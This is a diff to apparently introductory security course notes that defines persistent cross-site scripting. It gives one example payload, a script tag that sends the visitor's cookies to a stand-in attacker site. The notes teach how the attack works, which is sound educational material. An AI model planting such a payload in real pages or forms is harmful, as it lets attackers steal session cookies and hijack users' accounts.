sbsample/Intro-to-Security/Info.md

-The first example of an attack is the Cross Site Scripting attack (XSS).
+The first example of an attack is the Persistent Cross Site Scripting attack (XSS).
 This is allows the attacker to insert a JS   <Script> tag into a form.
 When the browser renders the html in the public post, the browser will automatically execute the JS.

 For example, if you were to type
    <script> window.location= 'http://www.someattacksite.com/?cookie='+document.cookie </script>